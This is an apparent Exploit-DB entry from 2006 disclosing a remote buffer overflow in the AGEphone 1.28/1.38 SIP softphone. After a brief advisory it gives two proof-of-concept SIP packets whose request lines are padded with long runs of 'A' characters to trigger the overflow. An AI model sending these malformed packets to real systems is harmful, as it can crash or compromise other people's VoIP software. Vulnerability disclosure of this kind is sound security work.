AGEphone 1.28/1.38 - SIP Packet Handling Buffer Overflow (PoC)

EDB-ID:

28266


Platform:

Windows

Published:

2006-07-24

source: http://www.securityfocus.com/bid/19148/info

AGEphone is prone to a remote buffer-overflow vulnerability.

Specifically, this issue presents itself when the application handles a malicious SIP (Session Initiation Protocol) packet.

AGEphone versions 1.24 and 1.38.1 are reported vulnerable; other versions may be affected as well.

SIP/AAAAAAAA[approx-68-bytes]AAAAAA 1 A
From: test
To: test

Or:

SIP/A 1 AAAAAAAA[approx-48-bytes]AAAAAA
From: test
To: test